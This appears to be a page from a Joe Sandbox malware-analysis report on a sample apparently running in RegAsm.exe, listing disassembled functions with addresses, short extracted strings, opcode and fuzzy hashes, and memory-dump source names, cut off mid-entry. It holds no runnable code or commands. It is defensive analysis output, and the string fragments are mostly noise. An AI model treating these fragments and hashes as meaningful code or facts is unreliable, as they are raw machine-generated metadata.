Opcode ID: 17417fa3628cf7f5b04a789fadb982a2aa47c1a68916248c8b732c4e9718207f
Instruction ID: 9695cd9248a7320cbd761fb78df0a02734abf8995342c504889e395b39462be9
Opcode Fuzzy Hash: 17417fa3628cf7f5b04a789fadb982a2aa47c1a68916248c8b732c4e9718207f
Instruction Fuzzy Hash: 7E728E7160C7818BD3249F38C4953AFBBE2ABD5314F194A3EE5D9873D2D67884858B07

Function 00423A34 Relevance: 10.4, Strings: 8, Instructions: 446COMMON

Download Yara Rule

Strings

|~, xrefs: 0042402E
>V, xrefs: 004241B0
EG, xrefs: 00423E7C
IK, xrefs: 00423E83
UW, xrefs: 00423E98
<>, xrefs: 004240B0
4%, xrefs: 00423CD5
>V, xrefs: 00424356

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4%$>V$>V$<>$EG$IK$UW$|~
API String ID: 0-2246970021
Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0

Function 00425E90 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 648COMMON

Download Yara Rule

Strings

V3R5, xrefs: 00426774
67, xrefs: 0042677F
@iB, xrefs: 0042693A, 00426DD8, 00426E0E
*mB, xrefs: 00426D24

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: *mB$67$@iB$V3R5
API String ID: 0-119712241
Opcode ID: 580e8cf0a12e00fa1f36186f19b506b71ff840fcc0f6e836628e4f566f146029
Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
Opcode Fuzzy Hash: 580e8cf0a12e00fa1f36186f19b506b71ff840fcc0f6e836628e4f566f146029
Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86

Function 004205B0 Relevance: 8.0, Strings: 6, Instructions: 481COMMON

Download Yara Rule

Strings

2g1i, xrefs: 00420695
B, xrefs: 00420ADF
wy, xrefs: 00420675
0c=e, xrefs: 0042068D
&', xrefs: 00420966
<k;m, xrefs: 0042069D

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: &'$0c=e$2g1i$<k;m$B$wy
API String ID: 0-2430453506
Opcode ID: f41f14918171499e701083ac4cca6cd69cf693930fc7e871dea7447ab30f5b7a
Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
Opcode Fuzzy Hash: f41f14918171499e701083ac4cca6cd69cf693930fc7e871dea7447ab30f5b7a
Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46

Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
zJyL, xrefs: 0042CB49
EF, xrefs: 0042CB6A
&=, xrefs: 0042CA18
D@6T, xrefs: 0042CA02
0, xrefs: 0042C8BB

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: &=$0$5$D@6T$EF$zJyL
API String ID: 0-3264166258
Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757

Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON

Download Yara Rule

Strings

[^, xrefs: 0041C1E8
C\, xrefs: 0041C1F0
-, xrefs: 0041C167
Iz, xrefs: 0041C15F
de, xrefs: 0041C34D

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: -$C\$Iz$[^$de
API String ID: 0-3020956940
Opcode ID: 48fb5841e8fc15a65971b2ccce4c7675603372e0af0c1bd974a24fdc44b1d18f
Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
Opcode Fuzzy Hash: 48fb5841e8fc15a65971b2ccce4c7675603372e0af0c1bd974a24fdc44b1d18f
Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86

Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
zJyL, xrefs: 0042CB49
EF, xrefs: 0042CB6A
&=, xrefs: 0042CA18
D@6T, xrefs: 0042CA02

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757

Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
zJyL, xrefs: 0042CB49
EF, xrefs: 0042CB6A
&=, xrefs: 0042CA18
D@6T, xrefs: 0042CA02

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757

Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON

Download Yara Rule

Strings

5, xrefs: 0042C91D
zJyL, xrefs: 0042CB49
EF, xrefs: 0042CB6A
&=, xrefs: 0042CA18
D@6T, xrefs: 0042CA02

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: &=$5$D@6T$EF$zJyL
API String ID: 0-923305466
Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757

Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON

Download Yara Rule

Strings

zusR, xrefs: 0041E14E
&-, xrefs: 0041E39A
)R_X, xrefs: 0041E170
[O_[, xrefs: 0041E2A8

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: &-$)R_X$[O_[$zusR
API String ID: 0-3432275560
Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A

Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON

Download Yara Rule

Strings

^QRW, xrefs: 00418B45
D@YO, xrefs: 00418B3E
"w+y, xrefs: 004185AB
?TUV, xrefs: 00418704

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: "w+y$?TUV$D@YO$^QRW
API String ID: 0-2418547040
Opcode ID: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
Opcode Fuzzy Hash: 12ad828b023f94b13548efcdd572775f6b83d34075b782378457432c8a1bdeea
Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44

Function 00423410 Relevance: 5.4, Strings: 4, Instructions: 415COMMON

Download Yara Rule

Strings

DF, xrefs: 00423452
+oQ, xrefs: 00423838
#$, xrefs: 00423496
?{;}, xrefs: 00423815

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: #$$+oQ$?{;}$DF
API String ID: 0-1090792222
Opcode ID: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
Instruction ID: f8f0a3fc3e126b0df0e9da8d66218e0bc810a6f9e0fb1804998ec3192ea1b230
Opcode Fuzzy Hash: fe6da00e438e1ead2a2d23196ddeab5711043166ad0a78cb1c77591abb4d52b2
Instruction Fuzzy Hash: 34E102B4E043549FEB10DF28D942B5EBBB0FB86304F1085ADE598AB381D7758946CF86

Function 004156A0 Relevance: 4.4, Strings: 3, Instructions: 617COMMON

Download Yara Rule

Strings

kmbj, xrefs: 00415B8C
in~x, xrefs: 00415AFB
ydij, xrefs: 00415B93

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: in~x$kmbj$ydij
API String ID: 0-2624003027
Opcode ID: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
Instruction ID: f79569228283954ad57b9a6cc496d73d61da5c1ffc761606bfa780fd5c95cafa
Opcode Fuzzy Hash: 368771055179ae10f3d8f5d678ba0a53bce91d3d7d6a2510e556935792b0b895
Instruction Fuzzy Hash: A91245B5600A01CFC7248F24D8D16A7BBA2FF96314F18857ED4968B396E738E842CB55

Function 004111E5 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

0, xrefs: 0041160F
V, xrefs: 004111F3
e, xrefs: 00411842

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0$V$e
API String ID: 0-3964817793
Opcode ID: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
Instruction ID: 59230c03b5a3a3693ef44b30c97d38267524f76adfdce6de0efbbb4ceb4d7fde
Opcode Fuzzy Hash: 9207e5ff9b94fdf015fcac0bd88a7bc55f734a6a516d8fe41e33a64d42c49df1
Instruction Fuzzy Hash: 9822E77290C7408BD724DF38C4913AEBBD2ABD5324F194A2EE5E9973D1DA388941CB47

Function 00426054 Relevance: 4.2, Strings: 3, Instructions: 483COMMON

Download Yara Rule

Strings

V3R5, xrefs: 00426774
67, xrefs: 0042677F
dB, xrefs: 004264D2

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 67$V3R5$dB
API String ID: 0-2543814982
Opcode ID: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
Instruction ID: 8517aef1948ed283949bb5420b5e04df083ffcb119de912f7f261172b9a423e3
Opcode Fuzzy Hash: 7d6b17f1b35bfbf9a10135164190d2ab3452f23863bf0e0451f9f93f012d59a2
Instruction Fuzzy Hash: 28F145B5A0C361CBC714DF24E85126BB7E1AF86304F09487EE8C297352D739E905CB5A

Function 00404CB0 Relevance: 3.3, Strings: 2, Instructions: 833COMMON

Download Yara Rule

Strings

0, xrefs: 0040562F
8, xrefs: 00405627

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
Instruction ID: d40c633f6dc63a9644a0400b392de52ca6438bdc0a59f23ad90aea60c423d6c9
Opcode Fuzzy Hash: 1f5ddf3591017bac3152340072b73a16e36c3305254729570d47587b87dca0fe
Instruction Fuzzy Hash: BC7213716087409FD714CF18C880BABBBE1EB88314F04892EF9899B391D379D948DF96

Function 004223B8 Relevance: 3.3, Strings: 2, Instructions: 772COMMON

Download Yara Rule

Strings

B*B, xrefs: 00422A24, 00422A2F
"*B, xrefs: 00422A0D

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: "*B$B*B
API String ID: 0-3938277345
Opcode ID: 5d36d8bc59f7a840cee538beabc9d9f1196a2cbbe69a0d8c195e412fdac48f78
Instruction ID: c0ff169c622c87bee100c6609ea31c9af3570951461718032b7520edbb3c94ef
Opcode Fuzzy Hash: 5d36d8bc59f7a840cee538beabc9d9f1196a2cbbe69a0d8c195e412fdac48f78
Instruction Fuzzy Hash: 53421276A00211DFCB18CF68DC90AAEB7B2FF49310F598179E905AB395D734AD11CB84

Function 00437399 Relevance: 3.0, Strings: 2, Instructions: 455COMMON

Download Yara Rule

Strings

kl, xrefs: 004377AC
., xrefs: 00437535

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: .$kl
API String ID: 0-2631956018
Opcode ID: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
Instruction ID: 6e525d0f0299ed0e456b3adafb39e2bcab09d4ef44449d93680b2b5d8b67f0fb
Opcode Fuzzy Hash: d144eace9ea77f902bcb9140e81b2a0528f571a57748096d515ff42ca28c8b60
Instruction Fuzzy Hash: 1FE1173A218709CBCB189F78EC5127A73F1FF4A741F4A887DD8818B2A1E7B99950C714

Function 0040A940 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

BE, xrefs: 0040AB5D
de, xrefs: 0040AAF3

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: BE$de
API String ID: 0-1272349043
Opcode ID: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction ID: 2d7de7b673e5cb152189fb1770f850f450cdad5ace7171a4f245c8b9200c7c18
Opcode Fuzzy Hash: 4d61e13fd748368ac6030c890ff82cb0220032c3e56c3c983d389722b1fc0e45
Instruction Fuzzy Hash: 2BD1057264C3544BD728DF2888516AFBBE2AFC2304F19492DE8D1AB391D678C916C787

Function 00404370 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

IEND, xrefs: 00404761
), xrefs: 004043EB

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 40dacf743ae77398cb425da77a9222dce02220864417a92cb34fecf70b6e0061
Instruction ID: 150efe4bc442e3656c1a555dd4695a78e1d3107f99c29cf50d30224799849ada
Opcode Fuzzy Hash: 40dacf743ae77398cb425da77a9222dce02220864417a92cb34fecf70b6e0061
Instruction Fuzzy Hash: 96D1BFB19083449FD710DF15D841B5BBBE4AB94308F14492EFA98AB3C2D779E908CB97

Function 004239F2 Relevance: 2.8, Strings: 2, Instructions: 296COMMON

Download Yara Rule

Strings

+oQ, xrefs: 00423838
?{;}, xrefs: 00423815

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: +oQ$?{;}
API String ID: 0-1414831546
Opcode ID: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
Instruction ID: f7e0cf01948a060ca3ae4ae96257901d3d9473cfc3be429b8585dccf822635a3
Opcode Fuzzy Hash: 1ee29228f1a6319e217c168091de010b371413e67c26b3c1ec204d280338f3ea
Instruction Fuzzy Hash: BCB1BFB4E043189FEB20DF68D942B9EBBB0FB45304F1081ADE158AB381D7758946CF96

Function 0042B1C0 Relevance: 2.8, Strings: 2, Instructions: 271COMMON

Download Yara Rule

Strings

RU]l, xrefs: 0042B1D8
Fg, xrefs: 0042B257

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: Fg$RU]l
API String ID: 0-3680832515
Opcode ID: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
Instruction ID: 6f8db59bce85ef316af4e5eced37d01641f7d5c841364d3efc2c21db6cf2a903
Opcode Fuzzy Hash: 2cdefad0313fa6e4cc5bdb883f2834b1e6d918137519908ea04b1d30e5e067f0
Instruction Fuzzy Hash: 2171087120D3808BE7398F25D8A57EB7BD2EBD2304F58996DC0C987392DB78440ACB56

Function 004256F9 Relevance: 2.7, Strings: 2, Instructions: 219COMMON

Download Yara Rule

Strings

O28+, xrefs: 00425935, 00425942
h, xrefs: 004258EC

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: O28+$h
API String ID: 0-657163135
Opcode ID: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
Instruction ID: 943cae955c8ebe7c4b26d457fd1afafbf5e793f4316e69c7cecf830d1c43eab0
Opcode Fuzzy Hash: 8dd85ae810d5b5fecc68ec4464ee5e33d050158683b23acf0f2d06bcda51bc6b
Instruction Fuzzy Hash: B561BE32B887258BD3149A38A8901B7F791EB55350F88473EDD96873C2E63C9D09C3DA

Function 0042750D Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

AzB, xrefs: 004275AA
`rB, xrefs: 00427341

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: AzB$`rB
API String ID: 0-365317308
Opcode ID: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
Instruction ID: 6eccde100400f429e4c459893b2eae1b4256d2ec662aaeb68cc10dd30f14b8df
Opcode Fuzzy Hash: 7d44a20d46df19d3b9013d5ff9cf62f4e3051a7763f9fbf866a5162179f586f0
Instruction Fuzzy Hash: 44118BB960C3919FC3049F29D59011BFBE0ABD5708F54DA6CE8C96B312D338DA018B8A

Function 00427326 Relevance: 2.5, Strings: 2, Instructions: 40COMMON

Download Yara Rule

Strings

AzB, xrefs: 004275AA
`rB, xrefs: 00427341

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: AzB$`rB
API String ID: 0-365317308
Opcode ID: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
Instruction ID: f6425de8d121e4265380cb8b8556ee32d0ff2cc323f56d540e3951a84df8493e
Opcode Fuzzy Hash: d52ee1f8136c3b98c0a9c934921d80b1beb3214e8eb7b5d6a7a040de55795b14
Instruction Fuzzy Hash: 810169B520D3919FC3049F29D59011BFBE0BBD5708F549A6CE8C96B312D334DA418B4A

Function 00417582 Relevance: 2.2, Strings: 1, Instructions: 985COMMON

Download Yara Rule

Strings

c$, xrefs: 00417707

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: c$
API String ID: 0-2516980088
Opcode ID: 3c7936fc6ee2aea87740d9eaff8fe823a77b75e4903c792a35abcdd5a2d9dcbb
Instruction ID: 8ddf10d90ef0e2d4ef8b1445a283de62437e0b874c2761f734db7318cd05b52d
Opcode Fuzzy Hash: 3c7936fc6ee2aea87740d9eaff8fe823a77b75e4903c792a35abcdd5a2d9dcbb
Instruction Fuzzy Hash: 2F6205742087418FD7258F28C8907A7BBF2FF5A310F19866DD4964B792D338E846CB58

Function 00439830 Relevance: 1.9, Strings: 1, Instructions: 681COMMON

Download Yara Rule

Strings

f, xrefs: 00439A65

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 69c56cbd072c103c916165a985ece037ff150be1b605a3a6d61b24965126020f
Instruction ID: c6061003a35e321c419c30bd02a3c4e1c0b56f4f8cbc670ef9e4360bbe252bef
Opcode Fuzzy Hash: 69c56cbd072c103c916165a985ece037ff150be1b605a3a6d61b24965126020f
Instruction Fuzzy Hash: 7722EF756083518FD718CF25C880A2BBBE2BBC9314F199A2DE4D587391DBB4EC06CB46

Function 00436C00 Relevance: 1.7, Strings: 1, Instructions: 453COMMON

Download Yara Rule

Strings

,)*k, xrefs: 00436D25

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: ,)*k
API String ID: 2994545307-1228391949
Opcode ID: 869930153e3630061cfc2212e87621c06b0f7d623c5796ac555c0ebedb5d3c29
Instruction ID: bb41e8b13f176b197a8e10d4dde50fa6e0ce8ca76c9034d38a3517968bb0ad29
Opcode Fuzzy Hash: 869930153e3630061cfc2212e87621c06b0f7d623c5796ac555c0ebedb5d3c29
Instruction Fuzzy Hash: F4C15A75A083116FD724DF21D881A2BB7E2ABDE704F16AA2EE5C553781D638DC04C78A

Function 00427DA2 Relevance: 1.7, Strings: 1, Instructions: 447COMMON

Download Yara Rule

Strings

m, xrefs: 00427DE0

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-3775001192
Opcode ID: 844987965f40079c61b601cedf19b759f80ba459d70370987815db4daec65b09
Instruction ID: 244b2cefeb1f5bc2c232bbf8925c55c2a37160be3d0d910679bc8471d4ecd8fe
Opcode Fuzzy Hash: 844987965f40079c61b601cedf19b759f80ba459d70370987815db4daec65b09
Instruction Fuzzy Hash: C6D134B5A093109FC320DF24D89126FB7A2EF96304F49492EE9D587352EB38D905CB96

Function 0041C6BB Relevance: 1.7, Strings: 1, Instructions: 444COMMON

Download Yara Rule

Strings

. , xrefs: 0041C767

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: .
API String ID: 0-1505114982
Opcode ID: 058d6976c154ba544523462971709c9beecc9be599d953173e0a21b130673455
Instruction ID: 5388aebb9722ef47512ed6758712c035957564ba8f43e3dcaa493907b87915b9
Opcode Fuzzy Hash: 058d6976c154ba544523462971709c9beecc9be599d953173e0a21b130673455
Instruction Fuzzy Hash: 5FC12AB5D40212CBCB24CF69CC916BBB7B1FF95310F19825DD896AB390E738A841CB94

Function 00428BE9 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

H, xrefs: 004290E3

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
Instruction ID: 0c29c4f326a3360d4f83cd19facfb249d1e6e8dcfa8d7f8eb9091c930c4cf0c7
Opcode Fuzzy Hash: f90cc14d5b1d07471296a569d27c41b333f7458cf0fcf530a90d726fe5722012
Instruction Fuzzy Hash: 69D17634B05254CFDB14CF78E8D16AEBBB2AF1A310F6841BDE5519B392CB384906CB59

Function 00421D10 Relevance: 1.7, Strings: 1, Instructions: 425COMMON

Download Yara Rule

Strings

&#, xrefs: 00421D7D

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: &#
API String ID: 0-1789715784
Opcode ID: 22a36dcdbd8bb691aabc79129864c8fc9f30262683b427dbcce92819f32defe7
Instruction ID: c9f534a10d10fcbb0aeeb65dde57b2602cc7be5083ad25e1a4bd69b4b534b867
Opcode Fuzzy Hash: 22a36dcdbd8bb691aabc79129864c8fc9f30262683b427dbcce92819f32defe7
Instruction Fuzzy Hash: 6FA14B71B042205BD7249B289C5267BB3E1EFA1324F89852EF896973D1E77CED01C35A

Function 0041CB05 Relevance: 1.7, Strings: 1, Instructions: 407COMMON

